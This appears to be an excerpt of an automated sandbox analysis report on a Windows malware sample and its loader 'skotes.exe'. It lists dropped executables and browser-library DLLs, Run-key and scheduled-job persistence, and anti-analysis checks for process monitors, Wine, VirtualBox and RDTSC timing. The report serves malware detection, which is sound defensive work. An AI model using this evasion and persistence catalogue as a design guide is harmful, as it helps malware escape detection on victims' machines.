Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Jump to dropped file
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\JKECGDBFCB.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57a07eec2d.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 815f2a8fe8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run feb3d39b6a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d957dbf73.exe
Monitors registry run keys for changes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run feb3d39b6a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run feb3d39b6a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 815f2a8fe8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 815f2a8fe8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d957dbf73.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d957dbf73.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57a07eec2d.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57a07eec2d.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5355F0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2018 second address: 5B201C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B201C second address: 5B2022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2022 second address: 5B2030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA6C4C2AB38h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2030 second address: 5B2035 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B22C5 second address: 5B22CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B241F second address: 5B242B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DD8 second address: 5B5DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DDC second address: 5B5DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DE0 second address: 5B5DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DE6 second address: 5B5DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DEB second address: 5B5DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DFB second address: 5B5E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA6C4D39096h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
